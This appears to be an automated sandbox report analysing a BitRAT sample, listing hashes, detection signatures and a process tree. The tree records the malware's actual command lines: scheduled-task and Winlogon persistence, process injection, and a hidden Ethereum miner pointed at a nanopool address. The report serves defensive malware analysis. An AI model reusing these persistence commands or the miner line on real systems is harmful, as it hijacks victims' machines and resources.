Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
26/04/2021, 22:57
Static task
static1
Behavioral task
behavioral1
Sample
6c2934d4_by_Libranalysis.exe
Resource
win7v20210408
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
6c2934d4_by_Libranalysis.exe
Resource
win10v20210410
0 signatures
0 seconds
General
-
Target
6c2934d4_by_Libranalysis.exe
-
Size
3.5MB
-
MD5
6c2934d437e948bf2727a4358edb9a59
-
SHA1
f5a10d17ebb6c2bd247156387d19accc6819cd3f
-
SHA256
aee478258bbebf0a4cb76eb703c210fa363edbb22d484fe3e6fbcf5f2c3d1af4
-
SHA512
ccb7c83a5c4f9f96aeeb03ee1460d964bae698e7a0d6b3aec1ab96af0ca7230173023c5c3b1cef29283053153181c69aec3a96bb027e3b39a94fd50ccdf5c246
Score
10/10
Malware Config
Signatures
-
BitRAT Payload 1 IoCs
resource yara_rule behavioral1/memory/1620-67-0x00000000007E2370-mapping.dmp family_bitrat -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\nDlv4j2nb6r0yUVx\\U3Ctpd3uDnvI.exe\",explorer.exe" 6c2934d4_by_Libranalysis.exe -
Executes dropped EXE 5 IoCs
pid Process 1672 KTf5bkmR3LyzkcSt.exe 1912 wsappx.exe 1376 sihost32.exe 1040 steamgfx.exe 860 sihost32.exe -
resource yara_rule behavioral1/memory/1620-66-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1620-70-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Loads dropped DLL 5 IoCs
pid Process 1948 6c2934d4_by_Libranalysis.exe 1672 KTf5bkmR3LyzkcSt.exe 1912 wsappx.exe 1912 wsappx.exe 1040 steamgfx.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1620 cvtres.exe 1620 cvtres.exe 1620 cvtres.exe 1620 cvtres.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1948 set thread context of 1620 1948 6c2934d4_by_Libranalysis.exe 30 PID 1040 set thread context of 1296 1040 steamgfx.exe 42 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 964 schtasks.exe 848 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1948 6c2934d4_by_Libranalysis.exe 1948 6c2934d4_by_Libranalysis.exe 1912 wsappx.exe 1912 wsappx.exe 1040 steamgfx.exe 1040 steamgfx.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1948 6c2934d4_by_Libranalysis.exe Token: SeDebugPrivilege 1620 cvtres.exe Token: SeShutdownPrivilege 1620 cvtres.exe Token: SeDebugPrivilege 1912 wsappx.exe Token: SeDebugPrivilege 1040 steamgfx.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1620 cvtres.exe 1620 cvtres.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 1948 wrote to memory of 1672 1948 6c2934d4_by_Libranalysis.exe 29 PID 1948 wrote to memory of 1672 1948 6c2934d4_by_Libranalysis.exe 29 PID 1948 wrote to memory of 1672 1948 6c2934d4_by_Libranalysis.exe 29 PID 1948 wrote to memory of 1672 1948 6c2934d4_by_Libranalysis.exe 29 PID 1948 wrote to memory of 1620 1948 6c2934d4_by_Libranalysis.exe 30 PID 1948 wrote to memory of 1620 1948 6c2934d4_by_Libranalysis.exe 30 PID 1948 wrote to memory of 1620 1948 6c2934d4_by_Libranalysis.exe 30 PID 1948 wrote to memory of 1620 1948 6c2934d4_by_Libranalysis.exe 30 PID 1948 wrote to memory of 1620 1948 6c2934d4_by_Libranalysis.exe 30 PID 1948 wrote to memory of 1620 1948 6c2934d4_by_Libranalysis.exe 30 PID 1948 wrote to memory of 1620 1948 6c2934d4_by_Libranalysis.exe 30 PID 1948 wrote to memory of 1620 1948 6c2934d4_by_Libranalysis.exe 30 PID 1672 wrote to memory of 1912 1672 KTf5bkmR3LyzkcSt.exe 31 PID 1672 wrote to memory of 1912 1672 KTf5bkmR3LyzkcSt.exe 31 PID 1672 wrote to memory of 1912 1672 KTf5bkmR3LyzkcSt.exe 31 PID 1672 wrote to memory of 1912 1672 KTf5bkmR3LyzkcSt.exe 31 PID 1912 wrote to memory of 1624 1912 wsappx.exe 32 PID 1912 wrote to memory of 1624 1912 wsappx.exe 32 PID 1912 wrote to memory of 1624 1912 wsappx.exe 32 PID 1624 wrote to memory of 964 1624 cmd.exe 34 PID 1624 wrote to memory of 964 1624 cmd.exe 34 PID 1624 wrote to memory of 964 1624 cmd.exe 34 PID 1912 wrote to memory of 1376 1912 wsappx.exe 35 PID 1912 wrote to memory of 1376 1912 wsappx.exe 35 PID 1912 wrote to memory of 1376 1912 wsappx.exe 35 PID 1912 wrote to memory of 1040 1912 wsappx.exe 36 PID 1912 wrote to memory of 1040 1912 wsappx.exe 36 PID 1912 wrote to memory of 1040 1912 wsappx.exe 36 PID 1040 wrote to memory of 944 1040 steamgfx.exe 37 PID 1040 wrote to memory of 944 1040 steamgfx.exe 37 PID 1040 wrote to memory of 944 1040 steamgfx.exe 37 PID 944 wrote to memory of 848 944 cmd.exe 39 PID 944 wrote to memory of 848 944 cmd.exe 39 PID 944 wrote to memory of 848 944 cmd.exe 39 PID 1040 wrote to memory of 860 1040 steamgfx.exe 41 PID 1040 wrote to memory of 860 1040 steamgfx.exe 41 PID 1040 wrote to memory of 860 1040 steamgfx.exe 41 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42 PID 1040 wrote to memory of 1296 1040 steamgfx.exe 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\6c2934d4_by_Libranalysis.exe"C:\Users\Admin\AppData\Local\Temp\6c2934d4_by_Libranalysis.exe"1⤵
- Modifies WinLogon for persistence
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Users\Admin\AppData\Local\Temp\KTf5bkmR3LyzkcSt.exe"C:\Users\Admin\AppData\Local\Temp\KTf5bkmR3LyzkcSt.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\wsappx.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\wsappx.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'5⤵
- Creates scheduled task(s)
PID:964
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"4⤵
- Executes dropped EXE
PID:1376
-
-
C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'6⤵
- Creates scheduled task(s)
PID:848
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"5⤵
- Executes dropped EXE
PID:860
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0x687ac23d19389af7925d29280d17be81f33b06c5`@eth-us-east1.nanopool.org:9999 --unam-stealth5⤵PID:1296
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1620
-